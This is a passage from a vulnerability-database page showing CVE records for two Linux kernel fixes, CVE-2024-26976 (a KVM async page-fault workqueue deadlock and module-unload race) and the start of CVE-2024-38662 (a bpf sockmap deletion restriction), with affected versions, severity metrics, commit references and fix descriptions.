Affected: af585b921e5d1e919947c4b1164b59507fe7cd7b , < f8730d6335e5f43d09151fca1f0f41922209a264 (git)
Affected: af585b921e5d1e919947c4b1164b59507fe7cd7b , < 83d3c5e309611ef593e2fcb78444fc8ceedf9bac (git)
Affected: af585b921e5d1e919947c4b1164b59507fe7cd7b , < b54478d20375874aeee257744dedfd3e413432ff (git)
Affected: af585b921e5d1e919947c4b1164b59507fe7cd7b , < a75afe480d4349c524d9c659b1a5a544dbc39a98 (git)
Affected: af585b921e5d1e919947c4b1164b59507fe7cd7b , < 4f3a3bce428fb439c66a578adc447afce7b4a750 (git)
Affected: af585b921e5d1e919947c4b1164b59507fe7cd7b , < caa9af2e27c275e089d702cfbaaece3b42bca31b (git)
Affected: af585b921e5d1e919947c4b1164b59507fe7cd7b , < 3d75b8aa5c29058a512db29da7cbee8052724157 (git)

Linux

Affected: 2.6.38
Unaffected: 0 , < 2.6.38 (semver)
Unaffected: 4.19.312 , ≤ 4.19.* (semver)
Unaffected: 5.4.274 , ≤ 5.4.* (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.154 , ≤ 5.15.* (semver)
Unaffected: 6.1.84 , ≤ 6.1.* (semver)
Unaffected: 6.6.24 , ≤ 6.6.* (semver)
Unaffected: 6.7.12 , ≤ 6.7.* (semver)
Unaffected: 6.8.3 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "ab2c2f5d9576",
                "status": "affected",
                "version": "af585b921e5d",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "82e25cc1c2e9",
                "status": "affected",
                "version": "af585b921e5d",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "8730d6335e5",
                "status": "affected",
                "version": "af585b921e5d",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "83d3c5e30961",
                "status": "affected",
                "version": "af585b921e5d",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "b54478d20375",
                "status": "affected",
                "version": "af585b921e5d",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "a75afe480d43",
                "status": "affected",
                "version": "af585b921e5d",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "4f3a3bce428f",
                "status": "affected",
                "version": "af585b921e5d",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "caa9af2e27c2",
                "status": "affected",
                "version": "af585b921e5d",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "3d75b8aa5c29",
                "status": "affected",
                "version": "af585b921e5d",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "affected",
                "version": "2.6.38"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "2.6.38",
                "status": "unaffected",
                "version": "0",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThanOrEqual": "4.20",
                "status": "unaffected",
                "version": "4.19.312",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThanOrEqual": "5.5",
                "status": "unaffected",
                "version": "5.4.274",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThanOrEqual": "5.11",
                "status": "unaffected",
                "version": "5.10.215",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThanOrEqual": "5.16",
                "status": "unaffected",
                "version": "5.15.154",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThanOrEqual": "6.2",
                "status": "unaffected",
                "version": "6.1.84",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThanOrEqual": "6.7",
                "status": "unaffected",
                "version": "6.6.24",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThanOrEqual": "6.8",
                "status": "unaffected",
                "version": "6.7.12",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThanOrEqual": "6.9",
                "status": "unaffected",
                "version": "6.8.3",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "unaffected",
                "version": "6.9"
              }
            ]
          }
        ],
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "HIGH",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 7,
              "baseSeverity": "HIGH",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "HIGH",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-26976",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-02-05T21:06:50.709457Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-400",
                "description": "CWE-400 Uncontrolled Resource Consumption",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-02-05T21:08:04.785Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:21:05.782Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ab2c2f5d9576112ad22cfd3798071cb74693b1f5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/82e25cc1c2e93c3023da98be282322fc08b61ffb"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f8730d6335e5f43d09151fca1f0f41922209a264"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/83d3c5e309611ef593e2fcb78444fc8ceedf9bac"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b54478d20375874aeee257744dedfd3e413432ff"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a75afe480d4349c524d9c659b1a5a544dbc39a98"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4f3a3bce428fb439c66a578adc447afce7b4a750"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/caa9af2e27c275e089d702cfbaaece3b42bca31b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3d75b8aa5c29058a512db29da7cbee8052724157"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "virt/kvm/async_pf.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "ab2c2f5d9576112ad22cfd3798071cb74693b1f5",
              "status": "affected",
              "version": "af585b921e5d1e919947c4b1164b59507fe7cd7b",
              "versionType": "git"
            },
            {
              "lessThan": "82e25cc1c2e93c3023da98be282322fc08b61ffb",
              "status": "affected",
              "version": "af585b921e5d1e919947c4b1164b59507fe7cd7b",
              "versionType": "git"
            },
            {
              "lessThan": "f8730d6335e5f43d09151fca1f0f41922209a264",
              "status": "affected",
              "version": "af585b921e5d1e919947c4b1164b59507fe7cd7b",
              "versionType": "git"
            },
            {
              "lessThan": "83d3c5e309611ef593e2fcb78444fc8ceedf9bac",
              "status": "affected",
              "version": "af585b921e5d1e919947c4b1164b59507fe7cd7b",
              "versionType": "git"
            },
            {
              "lessThan": "b54478d20375874aeee257744dedfd3e413432ff",
              "status": "affected",
              "version": "af585b921e5d1e919947c4b1164b59507fe7cd7b",
              "versionType": "git"
            },
            {
              "lessThan": "a75afe480d4349c524d9c659b1a5a544dbc39a98",
              "status": "affected",
              "version": "af585b921e5d1e919947c4b1164b59507fe7cd7b",
              "versionType": "git"
            },
            {
              "lessThan": "4f3a3bce428fb439c66a578adc447afce7b4a750",
              "status": "affected",
              "version": "af585b921e5d1e919947c4b1164b59507fe7cd7b",
              "versionType": "git"
            },
            {
              "lessThan": "caa9af2e27c275e089d702cfbaaece3b42bca31b",
              "status": "affected",
              "version": "af585b921e5d1e919947c4b1164b59507fe7cd7b",
              "versionType": "git"
            },
            {
              "lessThan": "3d75b8aa5c29058a512db29da7cbee8052724157",
              "status": "affected",
              "version": "af585b921e5d1e919947c4b1164b59507fe7cd7b",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "virt/kvm/async_pf.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.38"
            },
            {
              "lessThan": "2.6.38",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.312",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.274",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.154",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.84",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.24",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.312",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.274",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.154",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.84",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.24",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.12",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.3",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nKVM: Always flush async #PF workqueue when vCPU is being destroyed\n\nAlways flush the per-vCPU async #PF workqueue when a vCPU is clearing its\ncompletion queue, e.g. when a VM and all its vCPUs is being destroyed.\nKVM must ensure that none of its workqueue callbacks is running when the\nlast reference to the KVM _module_ is put.  Gifting a reference to the\nassociated VM prevents the workqueue callback from dereferencing freed\nvCPU/VM memory, but does not prevent the KVM module from being unloaded\nbefore the callback completes.\n\nDrop the misguided VM refcount gifting, as calling kvm_put_kvm() from\nasync_pf_execute() if kvm_put_kvm() flushes the async #PF workqueue will\nresult in deadlock.  async_pf_execute() can\u0027t return until kvm_put_kvm()\nfinishes, and kvm_put_kvm() can\u0027t return until async_pf_execute() finishes:\n\n WARNING: CPU: 8 PID: 251 at virt/kvm/kvm_main.c:1435 kvm_put_kvm+0x2d/0x320 [kvm]\n Modules linked in: vhost_net vhost vhost_iotlb tap kvm_intel kvm irqbypass\n CPU: 8 PID: 251 Comm: kworker/8:1 Tainted: G        W          6.6.0-rc1-e7af8d17224a-x86/gmem-vm #119\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015\n Workqueue: events async_pf_execute [kvm]\n RIP: 0010:kvm_put_kvm+0x2d/0x320 [kvm]\n Call Trace:\n  \u003cTASK\u003e\n  async_pf_execute+0x198/0x260 [kvm]\n  process_one_work+0x145/0x2d0\n  worker_thread+0x27e/0x3a0\n  kthread+0xba/0xe0\n  ret_from_fork+0x2d/0x50\n  ret_from_fork_asm+0x11/0x20\n  \u003c/TASK\u003e\n ---[ end trace 0000000000000000 ]---\n INFO: task kworker/8:1:251 blocked for more than 120 seconds.\n       Tainted: G        W          6.6.0-rc1-e7af8d17224a-x86/gmem-vm #119\n \"echo 0 \u003e /proc/sys/kernel/hung_task_timeout_secs\" disables this message.\n task:kworker/8:1     state:D stack:0     pid:251   ppid:2      flags:0x00004000\n Workqueue: events async_pf_execute [kvm]\n Call Trace:\n  \u003cTASK\u003e\n  __schedule+0x33f/0xa40\n  schedule+0x53/0xc0\n  schedule_timeout+0x12a/0x140\n  __wait_for_common+0x8d/0x1d0\n  __flush_work.isra.0+0x19f/0x2c0\n  kvm_clear_async_pf_completion_queue+0x129/0x190 [kvm]\n  kvm_arch_destroy_vm+0x78/0x1b0 [kvm]\n  kvm_put_kvm+0x1c1/0x320 [kvm]\n  async_pf_execute+0x198/0x260 [kvm]\n  process_one_work+0x145/0x2d0\n  worker_thread+0x27e/0x3a0\n  kthread+0xba/0xe0\n  ret_from_fork+0x2d/0x50\n  ret_from_fork_asm+0x11/0x20\n  \u003c/TASK\u003e\n\nIf kvm_clear_async_pf_completion_queue() actually flushes the workqueue,\nthen there\u0027s no need to gift async_pf_execute() a reference because all\ninvocations of async_pf_execute() will be forced to complete before the\nvCPU and its VM are destroyed/freed.  And that in turn fixes the module\nunloading bug as __fput() won\u0027t do module_put() on the last vCPU reference\nuntil the vCPU has been freed, e.g. if closing the vCPU file also puts the\nlast reference to the KVM module.\n\nNote that kvm_check_async_pf_completion() may also take the work item off\nthe completion queue and so also needs to flush the work queue, as the\nwork will not be seen by kvm_clear_async_pf_completion_queue().  Waiting\non the workqueue could theoretically delay a vCPU due to waiting for the\nwork to complete, but that\u0027s a very, very small chance, and likely a very\nsmall delay.  kvm_arch_async_page_present_queued() unconditionally makes a\nnew request, i.e. will effectively delay entering the guest, so the\nremaining work is really just:\n\n        trace_kvm_async_pf_completed(addr, cr2_or_gpa);\n\n        __kvm_vcpu_wake_up(vcpu);\n\n        mmput(mm);\n\nand mmput() can\u0027t drop the last reference to the page tables if the vCPU is\nstill alive, i.e. the vCPU won\u0027t get stuck tearing down page tables.\n\nAdd a helper to do the flushing, specifically to deal with \"wakeup all\"\nwork items, as they aren\u0027t actually work items, i.e. are never placed in a\nworkqueue.  Trying to flush a bogus workqueue entry rightly makes\n__flush_work() complain (kudos to whoever added that sanity check).\n\nNote, commit 5f6de5cbebee (\"KVM: Prevent module exit until al\n---truncated---"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:01:18.606Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/ab2c2f5d9576112ad22cfd3798071cb74693b1f5"
        },
        {
          "url": "https://git.kernel.org/stable/c/82e25cc1c2e93c3023da98be282322fc08b61ffb"
        },
        {
          "url": "https://git.kernel.org/stable/c/f8730d6335e5f43d09151fca1f0f41922209a264"
        },
        {
          "url": "https://git.kernel.org/stable/c/83d3c5e309611ef593e2fcb78444fc8ceedf9bac"
        },
        {
          "url": "https://git.kernel.org/stable/c/b54478d20375874aeee257744dedfd3e413432ff"
        },
        {
          "url": "https://git.kernel.org/stable/c/a75afe480d4349c524d9c659b1a5a544dbc39a98"
        },
        {
          "url": "https://git.kernel.org/stable/c/4f3a3bce428fb439c66a578adc447afce7b4a750"
        },
        {
          "url": "https://git.kernel.org/stable/c/caa9af2e27c275e089d702cfbaaece3b42bca31b"
        },
        {
          "url": "https://git.kernel.org/stable/c/3d75b8aa5c29058a512db29da7cbee8052724157"
        }
      ],
      "title": "KVM: Always flush async #PF workqueue when vCPU is being destroyed",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26976",
    "datePublished": "2024-05-01T05:20:24.025Z",
    "dateReserved": "2024-02-19T14:20:24.203Z",
    "dateUpdated": "2025-05-04T09:01:18.606Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-38662 (GCVE-0-2024-38662)

Vulnerability from cvelistv5 – Published: 2024-06-21 11:15 – Updated: 2025-05-04 12:56

Title

bpf: Allow delete from sockmap/sockhash only if update is allowed

Summary

In the Linux kernel, the following vulnerability has been resolved: bpf: Allow delete from sockmap/sockhash only if update is allowed We have seen an influx of syzkaller reports where a BPF program attached to a tracepoint triggers a locking rule violation by performing a map_delete on a sockmap/sockhash. We don't intend to support this artificial use scenario. Extend the existing verifier allowed-program-type check for updating sockmap/sockhash to also cover deleting from a map. From now on only BPF programs which were previously allowed to update sockmap/sockhash can delete from these map types.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/29467edc23818dc5a…
	https://git.kernel.org/stable/c/11e8ecc5b86037fec…
	https://git.kernel.org/stable/c/6693b172f00884681…
	https://git.kernel.org/stable/c/000a65bf1dc04fb2b…
	https://git.kernel.org/stable/c/b81e1c5a3c70398cf…
	https://git.kernel.org/stable/c/98e948fb60d41447f…

Impacted products

Vendor

Product

Version

Linux

Affected: dd54b48db0c822ae7b520bc80751f0a0a173ef75 , < 29467edc23818dc5a33042ffb4920b49b090e63d (git)
Affected: d1e73fb19a4c872d7a399ad3c66e8ca30e0875ec , < 11e8ecc5b86037fec43d07b1c162e233e131b1d9 (git)
Affected: a44770fed86515eedb5a7c00b787f847ebb134a5 , < 6693b172f008846811f48a099f33effc26068e1e (git)
Affected: 668b3074aa14829e2ac2759799537a93b60fef86 , < 000a65bf1dc04fb2b65e2abf116f0bc0fc2ee7b1 (git)
Affected: ff91059932401894e6c86341915615c5eb0eca48 , < b81e1c5a3c70398cf76631ede63a03616ed1ba3c (git)
Affected: ff91059932401894e6c86341915615c5eb0eca48 , < 98e948fb60d41447fd8d2d0c3b8637fc6b6dc26d (git)
Affected: f7990498b05ac41f7d6a190dc0418ef1d21bf058 (git)
Affected: 6af057ccdd8e7619960aca1f0428339f213b31cd (git)

Linux

Affected: 6.9
Unaffected: 0 , < 6.9 (semver)
Unaffected: 5.10.219 , ≤ 5.10.* (semver)
Unaffected: 5.15.161 , ≤ 5.15.* (semver)
Unaffected: 6.1.93 , ≤ 6.1.* (semver)
Unaffected: 6.6.33 , ≤ 6.6.* (semver)
Unaffected: 6.9.4 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-38662",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-21T13:43:09.177225Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-21T13:43:19.909Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:12:26.024Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/29467edc23818dc5a33042ffb4920b49b090e63d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/11e8ecc5b86037fec43d07b1c162e233e131b1d9"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6693b172f008846811f48a099f33effc26068e1e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/000a65bf1dc04fb2b65e2abf116f0bc0fc2ee7b1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b81e1c5a3c70398cf76631ede63a03616ed1ba3c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/98e948fb60d41447fd8d2d0c3b8637fc6b6dc26d"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "kernel/bpf/verifier.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "29467edc23818dc5a33042ffb4920b49b090e63d",
              "status": "affected",
              "version": "dd54b48db0c822ae7b520bc80751f0a0a173ef75",
              "versionType": "git"
            },
            {
              "lessThan": "11e8ecc5b86037fec43d07b1c162e233e131b1d9",
              "status": "affected",
              "version": "d1e73fb19a4c872d7a399ad3c66e8ca30e0875ec",
              "versionType": "git"
            },
            {
              "lessThan": "6693b172f008846811f48a099f33effc26068e1e",
              "status": "affected",
              "version": "a44770fed86515eedb5a7c00b787f847ebb134a5",
              "versionType": "git"
            },
            {
              "lessThan": "000a65bf1dc04fb2b65e2abf116f0bc0fc2ee7b1",
              "status": "affected",
              "version": "668b3074aa14829e2ac2759799537a93b60fef86",
              "versionType": "git"
            },
            {
              "lessThan": "b81e1c5a3c70398cf76631ede63a03616ed1ba3c",
              "status": "affected",
              "version": "ff91059932401894e6c86341915615c5eb0eca48",
              "versionType": "git"
            },
            {
              "lessThan": "98e948fb60d41447fd8d2d0c3b8637fc6b6dc26d",
              "status": "affected",
              "version": "ff91059932401894e6c86341915615c5eb0eca48",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "f7990498b05ac41f7d6a190dc0418ef1d21bf058",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "6af057ccdd8e7619960aca1f0428339f213b31cd",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "kernel/bpf/verifier.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.9"
            },
            {
              "lessThan": "6.9",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.219",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.161",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.93",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.33",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.4",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.219",
                  "versionStartIncluding": "5.10.215",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.161",
                  "versionStartIncluding": "5.15.154",
                  "vulnerable": true
                },
                {
